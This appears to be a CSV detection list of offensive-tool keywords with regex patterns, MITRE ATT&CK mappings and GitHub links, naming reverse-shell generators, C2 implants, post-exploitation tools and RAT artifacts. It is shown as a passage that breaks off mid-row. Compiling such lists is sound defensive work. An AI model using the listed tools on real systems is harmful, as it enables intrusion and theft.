"*cmd/unix/reverse_python*",".{0,1000}cmd\/unix\/reverse_python.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd_executor *",".{0,1000}cmd_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*cmd_powershell.cpp*",".{0,1000}cmd_powershell\.cpp.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*cmd_shellcodex64.*",".{0,1000}cmd_shellcodex64\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*cmd_shellcodex86.*",".{0,1000}cmd_shellcodex86\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Cmd-Execute-Assembly.*",".{0,1000}Cmd\-Execute\-Assembly\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Cmd-Inline-Execute.*",".{0,1000}Cmd\-Inline\-Execute\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*cmdinspector OFF*",".{0,1000}cmdinspector\sOFF.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*cmdinspector ON*",".{0,1000}cmdinspector\sON.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*CmdLineSpoofer.exe*",".{0,1000}CmdLineSpoofer\.exe.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*CmdLineSpoofer.sln*",".{0,1000}CmdLineSpoofer\.sln.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*CmdLineSpoofer-master*",".{0,1000}CmdLineSpoofer\-master.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*cmdshell *",".{0,1000}cmdshell\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Cmd-Shinject.*",".{0,1000}Cmd\-Shinject\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Cmd-Upload.*",".{0,1000}Cmd\-Upload\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*cme -d * -*",".{0,1000}cme\s\-d\s.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme -d *localhost*",".{0,1000}cme\s\-d\s.{0,1000}localhost.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme*-macOS-latest-*",".{0,1000}cme.{0,1000}\-macOS\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme*-ubuntu-latest-*",".{0,1000}cme.{0,1000}\-ubuntu\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme*-windows-latest-*",".{0,1000}cme.{0,1000}\-windows\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme/cme.conf*",".{0,1000}cme\/cme\.conf.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme_bloodhound_output_*.txt*",".{0,1000}cme_bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_dfscoerce_output_*.txt*",".{0,1000}cme_dfscoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_get-desc-users_pass_output_*",".{0,1000}cme_get\-desc\-users_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_get-desc-users_pass_results*",".{0,1000}cme_get\-desc\-users_pass_results.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_gpp_output_*.txt*",".{0,1000}cme_gpp_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_ldap-checker_output_*",".{0,1000}cme_ldap\-checker_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_MachineAccountQuota_output_*",".{0,1000}cme_MachineAccountQuota_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_ms17-010_output_*",".{0,1000}cme_ms17\-010_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_mssql_priv_output_*.txt*",".{0,1000}cme_mssql_priv_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_ntlmv1_output_*",".{0,1000}cme_ntlmv1_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_passpol_output_*.txt*",".{0,1000}cme_passpol_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_petitpotam_output_*.txt*",".{0,1000}cme_petitpotam_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_printnightmare_output_*.txt*",".{0,1000}cme_printnightmare_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_runasppl_output_*.txt*",".{0,1000}cme_runasppl_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_shadowcoerce_output_*.txt*",".{0,1000}cme_shadowcoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_smb_enum*",".{0,1000}cme_smb_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_smbsigning_output_*.txt*",".{0,1000}cme_smbsigning_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_subnets_output_*.txt*",".{0,1000}cme_subnets_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_trusted-for-delegation_output_*",".{0,1000}cme_trusted\-for\-delegation_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_users_auth_ldap_*.txt*",".{0,1000}cme_users_auth_ldap_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_users_auth_smb_*.txt*",".{0,1000}cme_users_auth_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_users_nullsess_smb_*.txt*",".{0,1000}cme_users_nullsess_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_webdav_output_*.txt*",".{0,1000}cme_webdav_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_zerologon_output_*.txt*",".{0,1000}cme_zerologon_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme-macOS-latest-*.zip*",".{0,1000}cme\-macOS\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme-ubuntu-latest-*.zip*",".{0,1000}cme\-ubuntu\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme-windows-latest-*.zip*",".{0,1000}cme\-windows\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*CMLoot.psm1*",".{0,1000}CMLoot\.psm1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*CMLoot-main*",".{0,1000}CMLoot\-main.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*cmpivot.py*",".{0,1000}cmpivot\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*cms400net_default_userpass*",".{0,1000}cms400net_default_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Cmstp-Bypass.dll*",".{0,1000}Cmstp\-Bypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*Cmstp-Bypass.pdb*",".{0,1000}Cmstp\-Bypass\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*cmVmbGVjdGl2ZQ==*",".{0,1000}cmVmbGVjdGl2ZQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*",".{0,1000}CN\=DcRat\sServer.{0,1000}OU\=qwqdanchun.{0,1000}O\=DcRat\sBy\sqwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*CN=PortSwigger*",".{0,1000}CN\=PortSwigger.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CN=ShadowSpray*",".{0,1000}CN\=ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*cnotin/SplunkWhisperer2*",".{0,1000}cnotin\/SplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - 